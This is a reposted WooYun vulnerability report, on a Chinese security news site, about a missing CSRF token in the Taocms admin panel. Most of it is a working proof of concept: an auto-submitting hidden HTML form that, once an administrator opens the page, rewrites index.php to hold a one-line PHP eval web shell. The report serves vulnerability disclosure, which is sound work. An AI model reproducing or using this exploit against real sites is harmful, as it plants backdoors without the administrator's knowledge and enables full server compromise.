热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

Taocms无token导致Csrf-getshell

发布时间:2013-09-10 09:58文章来源:wooyun文章作者:VIP 点击次数:
摘要:漏洞作者: VIP 提交时间: 2013-07-26 11:13 公开时间: 2013-09-09 11:14 漏洞类型: CSRF 简要描述: 无token,所以可以通过交互管理员进行Csrf-getshell,全程只需要管理员点击一个网页,不知不觉getshell就自动完成了。 详细说明: 后台有编辑文件功能...

漏洞作者: VIP

提交时间: 2013-07-26 11:13
公开时间: 2013-09-09 11:14

漏洞类型: CSRF
简要描述:

无token,所以可以通过交互管理员进行Csrf-getshell,全程只需要管理员点击一个网页,不知不觉getshell就自动完成了。
详细说明:

后台有编辑文件功能,可以编辑php文件,植入一句话。

且此功能无token限制,导致可以通过一个Csrf交互来getshell.

POC如下(如运行不正常,为乌云编辑器所致,将中间的空行删去即可):

 

  1. 代表乌云消灭你 
  2.  
  3. <form action="http://yunsec.net/admin/admin.php" method="POST" target="hidden_frame"> 
  4.  
  5. <input type="hidden" name="filedata" value="<?php 
  6.  
  7. @eval($_REQUEST['wooyun']); 
  8.  
  9. include 
  10.  
  11. ('config.php'); 
  12.  
  13. include(SYS_ROOT.INC.'common.php'); 
  14.  
  15. $path=$_SERVER['PATH_INFO'].($_SERVER 
  16.  
  17. ['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):''); 
  18.  
  19. if(substr($path, 
  20.  
  21. 0,1)=='/'){ 
  22.  
  23. $path=substr($path,1); 
  24.  
  25.  
  26. $ctrl=isset($_GET['action'])?$_GET['action']:'run'; 
  27.  
  28. if(isset($_GET['createprocess'])) 
  29.  
  30.  
  31. Index::createhtml(isset($_GET['id'])?$_GET 
  32.  
  33. ['id']:0,$_GET['cat'],$_GET['single']); 
  34.  
  35. }else{ 
  36.  
  37. Index::$ctrl($path); 
  38.  
  39.  
  40. ?>/> 
  41.  
  42. <input type="hidden" name="input" value="index.php" /> 
  43.  
  44. <input type="hidden" name="name" value="index.php" /> 
  45.  
  46. <input type="hidden" name="action" value="file" /> 
  47.  
  48. <input type="hidden" name="ctrl" value="save" /> 
  49.  
  50. <input type="hidden" name="path" value="index.php" /> 
  51.  
  52. </form><iframe style="DISPLAY: none" id=hidden_frame name=hidden_frame></iframe> 
  53.  
  54. <script> 
  55.  
  56. document.forms[0].submit(); 
  57.  
  58. </script> 

漏洞证明:

页面上只是一段简单的文字,但是其实后台已经发起了一次POST请求,在index.php中植入了一句话木马。
 

Taocms无token导致Csrf-getshell
Taocms无token导致Csrf-getshell
Taocms无token导致Csrf-getshell

 

标签分类:

上一篇:espcms后台getshell-3 利用csrf交互强制管理员getshell
下一篇:yxcms二次SQL注入漏洞